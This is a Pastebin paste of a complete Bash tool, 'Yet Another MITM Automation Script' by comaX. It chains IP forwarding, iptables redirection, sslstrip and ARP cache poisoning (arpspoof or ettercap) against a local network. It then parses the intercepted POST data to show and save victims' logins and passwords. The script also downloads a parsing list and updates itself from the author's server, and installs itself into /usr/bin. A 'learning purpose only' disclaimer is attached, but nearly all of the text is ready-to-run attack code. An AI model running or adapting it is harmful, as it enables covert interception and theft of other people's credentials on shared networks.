Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Bash script to launch man it the middle attack and sslstrip.
- # version 0.9 by comaX
- version="0.9.4"
- # if user ^C then execute cleanup function
- trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
- fast_cleanup() {
- echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
- if [[ ${looparseid} != "" ]]; then kill ${looparseid}
- fi
- if [[ ${sslstripid} != "" ]]; then kill ${sslstripid}
- fi
- if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
- fi
- if [[ "$1" = "-e" || "$2" = "-e" ]]; then
- killall ettercap
- else
- killall arpspoof
- fi
- echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
- iptables --flush # there are probably too many resets here,
- iptables --table nat --flush # but at least we're sure everything's clean
- iptables --delete-chain
- iptables --table nat --delete-chain
- if [ -e '/tmp/looparse.sh' ]; then
- rm /tmp/looparse.sh
- fi
- if [ -e '/tmp/grepcred.txt' ]; then
- rm /tmp/grepcred.txt
- fi
- echo -e "\033[32m[-] Clean up successful !\033[m"
- exit 0
- }
- #Let's define some arguments that can be passed to the script :
- if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filename
- if [[ $2 == "" ]]; then
- echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
- exit 0
- fi
- clear
- wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
- echo -e "Parsing $2 for credentials.\n\n"
- cat $2 |
- awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
- awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
- egrep -i -a -f /tmp/grepcred.txt |
- awk -F "=" '{if (length($2) < 4) print "";
- else if ($1 ~/Website/) print $0;
- else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
- else print "Login = \t"$2}' |
- uniq
- rm /tmp/grepcred.txt
- exit 0
- fi
- if [[ "$1" = "-e" || "$2" = "-e" ]]; then
- echo -e "\tYou will be using Ettercap instead of ARPspoof."
- sleep 0.5
- fi
- if [[ "$1" = "-h" || "$1" = "--help" ]]; then #define help message
- clear
- echo -e "You are running $0, version $version.
- usage : $0 [-h -c -p]* [-e -s]**
- -h or --help : Display this help message, disclaimer and exit.
- -c or --change: Display changelog and todo.
- -e : Use ettercap instead of ARPspoof. One might have one's reasons...
- ARPspoof is default.
- -p or --parse : Only parse the given <file>. Don't use wildcards.
- Use > /output_file to print to a file.
- -s : The script won't download anything. Make sure you have the needed files.
- *Must be used alone
- **Can be used at the same time.
- \033[31m DISCLAIMER :\033[m
- This program is intended for learning purpose only. I do not condone hacking
- and wouldn't be held responsible for your actions. Only you would face legal
- consequences if you used this script for illegal activities.
- \033[31m What I think should be learnt from this script :\033[m
- This script should teach you how easy it is to steal sensitive online
- credentials and how to protect you from it, provided you understand
- what this program does. The best way to understand what it does is
- to look at its source. This will also teach you basic shell scripting."
- exit 0
- fi
- if [[ "$1" = "-c" || "$1" = "--change" ]]; then #Changelog
- clear
- echo -e "\033[31m Changelog :\033[m
- Should be added in next version/revision :
- - Submit your ideas !
- - We're close to a final version !
- Added in v0.9.x
- - Ettercap support (with -e switch in parameters)
- - Silent mode (-s)
- - Code enhancing.
- Added in v0.8.x
- - Tail-greping log file so we can be sure there is traffic being sniffed
- - New parsing method from scratch : should be lighter, less CPU consuming, and most of all, outputs websites as well.
- This should be tested though to ensure maximum reliability. Please report back !
- 0.8.5 : now grep from downloaded file, to allow more updates on parsing, without updating the whole script.
- - New -p option to allow only parsing a file. (v0.8.5)
- - More improvements.
- - Catching ^C and cleanup before quitting. (v0.8.5)
- - Realtime parsing menu. (V0.8.5)
- \033[31mFeatures :\033[m
- - Output of credentials as they are sniffed in xterm window.
- - Log parsing for user-friendly output.
- - Both arpspoof and ettercap are suported
- - Network mapping for host discovery.
- - Can save \"dumped\" passwords to file.
- - Support for multiple targets on the network.
- - Can parse a single file.
- - Install sslstrip if needed.
- - Display ASCII tables for better readability of creds.
- - All options know default, pressing only enter should get you through.
- - Very neat and kewl ascii =D
- \033[31m Credits :\033[m
- Credits go to all people on backtrack forums for their help and support,
- and google for being my best friend with scripting.
- Special kudos to ShortBuss for something I should have seen a
- long time ago (sslstrip before arpspoof) and many little improvements.
- And of course, to the people responsible for the tools I am using in this script.
- Please criticize this program or submit ideas on the official thread at
- http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
- exit
- fi
- ### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
- if [[ "$1" = "-s" || "$2" = "-s" ]]; then
- message="\nNo message to display : you are running in silent mode"
- else
- wget -q http://comax.fr/yamas/bt5/message -O /tmp/message
- message=$(cat /tmp/message) #store it to variable
- rm /tmp/message #remove temp message file
- fi
- ### Check for updates !
- if [[ "$1" = "-s" || "$2" = "-s" ]]; then
- echo "Not checking for a new version : silent mode."
- else
- wget -q http://comax.fr/yamas/bt5/version -O /tmp/version # Get last version number
- last_version=$(cat /tmp/version) #store it to variable
- rm /tmp/version #remove temp version file
- if [[ $last_version > $version ]] ; then # Comparing to current version
- echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)"
- read update
- if [[ $update = Y || $update = y ]] ; then
- echo "[+] Updating script..."
- wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
- chmod +x $0
- echo "[-] Script updated !"
- if [[ $0 != '/usr/bin/yamas' ]] ; then
- echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
- read install
- if [[ $install = Y || $install = y ]] ; then #do not proceed to install if using installed version : updating it already "installed" it over.
- cp $0 /usr/bin/yamas
- chmod +x /usr/bin/yamas
- echo "Script should now be installed, launching yamas !"
- sleep 3
- yamas
- exit 1
- else echo "Ok, continuing with updated version..."
- sleep 3
- $0
- exit 1
- fi
- fi
- sleep 2
- $0
- exit 1
- else echo "Ok, continuing with current version..."
- fi
- else echo "No update available"
- fi
- fi
- ### End of update process
- ### Install process
- if [[ ! -e '/usr/bin/yamas' ]] ; then
- echo "Script is not installed. Do you want to install it ? (Y/N)"
- read install
- if [[ $install = Y || $install = y ]] ; then
- cp -v $0 /usr/bin/yamas
- chmod +x /usr/bin/yamas
- rm $0
- echo "Script should now be installed. Launching it !"
- sleep 3
- yamas
- exit 1
- else echo "Ok, not installing then !"
- fi
- else echo "Script is installed"
- sleep 1
- fi
- ### End of install process
- clear
- echo -e "
- _______ _______ _______ _______ _______ _____
- |\ /|( ___ )( )( ___ )( ____ \ |\ /|( __ ) / ___ \
- ( \ / )| ( ) || () () || ( ) || ( \/ | ) ( || ( ) | ( ( ) )
- \ (_) / | (___) || || || || (___) || (_____ | | | || | / | ( (___) |
- \ / | ___ || |(_)| || ___ |(_____ ) ( ( ) )| (/ /) | \____ |
- ) ( | ( ) || | | || ( ) | ) | \ \_/ / | / | | ) |
- | | | ) ( || ) ( || ) ( |/\____) | \ / | (__) | _ /\____) )
- \_/ |/ \||/ \||/ \|\_______) \_/ (_______)(_)\______/ " # <= I love it.
- echo -e "===========================================================================
- =\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
- =\033[31m Use this tool responsibly, and enjoy!\033[m =
- = Feel free to contribute and distribute this script as you please. =
- = Official thread : http://tinyurl.com/yamas-bt5 =
- = Check out the help (-h) to see new features and informations =
- = You are running version \033[32m$version\033[m =
- ==========================================================================="
- echo -e "\033[36mMessage of the day :\033[m"
- echo -e "$message"
- echo
- # Starting fresh : reset IP forward and iptables
- echo -e "\033[31m [+] Cleaning iptables \033[m"
- echo "0" > /proc/sys/net/ipv4/ip_forward
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- echo "[-] Cleaned."
- # Defining exit function and other ending features
- cleanup() {
- echo
- echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"
- kill ${sslstripid}
- kill ${looparseid}
- if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
- fi
- if [[ "$1" = "-e" || "$2" = "-e" ]]; then
- killall ettercap
- else
- killall arpspoof
- fi
- echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
- iptables --flush # there are probably too many resets here,
- iptables --table nat --flush # but at least we're sure everything's clean
- iptables --delete-chain
- iptables --table nat --delete-chain
- rm /tmp/looparse.sh
- rm /tmp/grepcred.txt
- echo -e "\033[32m[-] Clean up successful !\033[m"
- echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
- echo "(If you want to keep it, it will be stored in /root/$filename.txt)"
- read -e keep
- if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
- cp /tmp/$filename.txt /root/$filename.txt #moving file
- if [ -f "/root/$filename.txt" ]; then #check if it exists
- echo "Log file copied !" #it does
- else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
- fi
- else echo "Logs not saved"
- fi
- echo
- echo "Do you want to save passwords to a file? (Y=keep)"
- echo "(If you want to keep it, it will be saved in /root/$filename.pass.txt)"
- read -e keeppd
- if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
- if [[ "$1" = "-s" || "$2" = "-s" ]]; then
- echo "Not downloading needed 'grepcred.txt' file because of silent mode. Make sure you already have a copy or the parsing *will* fail."
- else
- wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
- fi
- cat /tmp/$filename.txt |
- awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
- awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
- egrep -i -a -f /tmp/grepcred.txt |
- awk -F "=" '{if (length($2) < 4) print "";
- else if ($1 ~/Website/) print $0;
- else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
- else print "Login = \t"$2}' |
- uniq >> /root/$filename.pass.txt # >> appends to a potential previous file.
- if [ -f "/root/$filename.pass.txt" ]; then #check if it exists
- echo "Passwords saved !" #it does
- else echo "Error while saving passwords" #it does not
- fi
- else echo "Password saving skipped."
- fi
- rm /tmp/$filename.txt
- echo -e "\nTemporary files deleted."
- if [ -f "/usr/bin/yamas" ]; then #check if script is already installed
- echo
- echo
- exit 1 #if yes, exit.
- else
- echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
- read -e install
- if [[ $install = "Y" || $install="y" ]] ; then
- cp ./yamas.sh /usr/bin/yamas #copy and rename script
- echo -e "\033[32m Script installed !\033[m"
- else echo "Script not installed."
- fi
- fi
- exit 1
- }
- updatestrip() {
- wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
- tar zxvf sslstrip-0.9.tar.gz
- cd sslstrip-0.9
- python ./setup.py install > /dev/null
- cd ..
- rm sslstrip-0.9.tar.gz
- }
- search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
- #We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
- #so there is no need to do it twice.
- rescan () {
- echo -e "\033[31m"
- nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
- echo -en "\033[m"
- final
- }
- add_target() {
- echo "Enter a new IP adress to attack :"
- read newip
- xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
- final
- }
- ascii() {
- clear
- if [[ "$1" = "-s" || "$2" = "-s" ]]; then
- echo "ASCII tables won't be available"
- echo "ASCII tables are not available" > /tmp/ascii
- else
- wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
- cat /tmp/ascii
- rm /tmp/ascii
- fi
- final
- }
- tailsecure() {
- xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f /tmp/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
- final
- }
- rtparse() {
- echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
- 1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
- 2. Resume RTP.
- 3. Kill RTP (stop and close xterm)
- 4. Re-launch RTP
- 5. Previous menu."
- read rtp
- if [ "$rtp" = "1" ] ; then
- echo -e "\033[33m[+]Pausing...\033[m"
- kill -19 ${looparseid}
- echo -e "\033[33m[-]Paused.\033[m"
- rtparse
- elif [ "$rtp" = "2" ] ; then
- echo -e "\033[33m[+]Resuming...\033[m"
- kill -18 ${looparseid}
- echo -e "\033[33m[-]Resumed.\033[m"
- rtparse
- elif [ "$rtp" = "3" ] ; then
- echo -e "\033[31m[+]Killing...\033[m"
- kill ${looparseid}
- echo -e "\033[33m[-]Killed.\033[m"
- rtparse
- elif [ "$rtp" = "4" ] ; then
- echo -e "\033[32m[+]Launching...\033[m"
- xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
- sleep 2
- echo -e "\033[33m[-]Launched.\033[m"
- rtparse
- elif [ "$rtp" = "5" ] ; then
- echo "Previous"
- final
- else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
- rtparse
- fi
- }
- final() {
- echo -e "\n\033[32mAttack is running\033[m. You can :
- 1. Rescan network.
- 2. Add a target (useless if targeting whole network).
- 3. Display ASCII correspondence table.
- 4. Tail-grep hosts through output (make sure there is traffic).
- 5. Real-time parsing...
- 6. Quit properly.
- Enter the number of the desired option."
- read final
- if [ "$final" = "1" ] ; then
- rescan
- elif [ "$final" = "2" ] ; then
- add_target
- elif [ "$final" = "3" ] ; then
- ascii
- elif [ "$final" = "4" ] ; then
- tailsecure
- elif [ "$final" = "5" ] ; then
- rtparse
- elif [ "$final" = "6" ] ; then
- cleanup
- else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
- final
- fi
- }
- ###############################End of functions#############################
- # IP forwarding
- echo
- echo -e "\033[31m [+] Activating IP forwarding... \033[m"
- echo "1" > /proc/sys/net/ipv4/ip_forward
- echo "[-] Activated."
- #Iptables
- echo
- echo -e "\033[31m [+] Configuring iptables... \033[m"
- echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
- echo
- read -e outport
- if [ "$outport" = "" ] ; then
- outport=8080
- echo -e "Port $outport selected as default.\n"
- fi
- echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
- echo
- read -e inport
- if [ "$inport" = "" ] ; then
- inport=80
- echo -e "Port $inport selected as default.\n"
- fi
- echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
- iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
- echo "[-] Traffic rerouted"
- #Sslstrip
- echo
- echo -e "\033[31m [+] Activating sslstrip... \033[m"
- echo "Choose filename to output : (default = yamas)"
- read -e filename
- if [ "$filename" = "" ] ; then
- filename="yamas"
- fi
- echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
- #### BEGIN of update process ####
- if [[ "$1" = "-s" || "$2" = "-s" ]]; then
- echo "Not checking for updates here either. Sslstrip should be installed or attack will fail."
- sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
- else
- if [ -e '/usr/local/bin/sslstrip' ]; then # If sslstrip exists
- sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
- if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
- echo -e "Sslstrip version $sslversion is installed but a newer one (0.9) exists. Do you want to update \033[4mand\033[m install latest
- version ? [Y/N]
- Note that it will download it from the official website, but might be not supported by BT team on the forums as long as it's not in the repos. It
- should be safe to use though."
- read -e sslupdate
- if [[ $sslupdate = "Y" || $sslupdate = "y" ]] ; then #if yes, updating.
- updatestrip
- sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
- if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
- else echo "\033[33mOops, install failed.\033[m Continuing with current version."
- fi
- else echo "All right, continuing with current version."
- fi
- elif [[ $sslversion = "0.9" ]]; then
- echo -e "\n\033[32mSslstrip is up to date, continuing...\033[m"
- fi
- elif [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
- sslversion=$(cat /pentest/web/sslstrip/sslstrip.py | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
- if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
- echo -e "Sslstrip v$sslversion was found, not installed, but executable. Do you want to \033[4mU\033[mpdate or \033[4mC\033[montinue ? "
- read -e sslupdate
- if [[ $sslupdate = "U" || $sslupdate = "u" ]] ; then #if yes, updating.
- updatestrip
- sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
- if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
- sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
- sleep 3
- else echo "\033[33mOops, install failed.\033[m Continuing with current, non installed version."
- /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
- sleep 3
- fi
- else echo "All right, continuing with current, non-installed version."
- /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
- sleep 3
- fi
- fi
- elif [ -e '/pentest/web/sslstrip/sslstrip.py' ]; then
- echo "Sslstrip was found, but not installed and not executable. Making it executable... (not installing)"
- chmod +x '/pentest/web/sslstrip/sslstrip.py'
- if [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
- echo "Now it is. Continuing..."
- /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
- sleep 3
- else echo "Sslstrip couldn't be found. You might be using a wrong version of this script or it is not
- installed.
- You can download BT4r2 version of this script at http://tinyurl.com/mitm-yamas. To install sslstrip use
- apt-get install sslstrip. Do you want to install it ? (will quit after) Y/N"
- read apti
- if [[ $apti = "Y" || $apti = "y" ]] ; then
- apt-get install sslstrip
- exit 1
- fi
- fi
- fi
- fi
- sleep 2 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
- echo
- echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
- echo
- #Arpspoofing
- echo
- echo -e "\033[31m [+] Activating ARP cache poisoning... \033[m"
- echo
- ip route show | awk '(NR == 2) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
- iface=$(ip route show | awk '(NR == 2) { print $5}')
- gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
- echo
- echo "Enter IP gateway adress or press enter to use $gateway."
- read -e gateway
- if [ "$gateway" = "" ] ; then
- gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
- echo -e "$gateway selected as default.\n"
- fi
- echo
- echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
- read -e iface
- if [ "$iface" = "" ] ; then
- iface=$(ip route show | awk '(NR == 2) { print $5}') #store default interface
- echo -e "$iface selected as default.\n"
- fi
- echo -e "\r"
- echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
- Press enter to default."
- read -e choicearp
- echo
- if [[ $choicearp = "D" || $choicearp = "d" ]] ; then
- echo
- echo -e "Do you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
- read -e hosts
- echo -e "\033[31m "
- if [[ $hosts = "Y" || $hosts = "y" ]] ; then
- nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
- echo -e "\033[m " # switch color back to white
- else echo -e "\033[m "
- fi
- echo -e "Please enter targets according to usage : IP1 IP2 IP3...
- \033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
- arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
- while [ "$1" != "" ]; do
- xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
- shift
- done
- echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
- }
- ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
- while [ "$1" != "" ]; do
- xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
- shift
- done
- echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
- }
- read -e parameters
- if [[ "$1" = "-e" || "$2" = "-e" ]]; then
- ettercapi $parameters
- else
- arpspoofi $parameters
- fi
- else
- if [[ "$1" = "-e" || "$2" = "-e" ]]; then
- xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
- sleep 2
- echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
- else
- xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
- sleep 2
- echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
- fi
- fi
- echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
- echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
- echo
- echo
- echo "looparse(){" > /tmp/looparse.sh
- if [[ "$1" = "-s" || "$2" = "-s" ]]; then sleep 0.5
- else
- echo "wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt" >> /tmp/looparse.sh
- fi
- echo "while :
- do
- clear
- echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
- cat /tmp/$filename.txt |
- awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
- awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
- egrep -i -f '/tmp/grepcred.txt' |
- awk -F \"=\" '{if (length(\$2) < 3) print \"\";
- else if (\$1 ~/[W]/) print \$0;
- else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
- else print \"Login = \t\t\", \$2}' |
- uniq
- sleep 7
- done
- }
- looparse" >> /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
- chmod +x /tmp/looparse.sh
- xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
- sleep 2
- final #call the "final" function. Yes, it's the final one.
- ### End of the script fellas.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement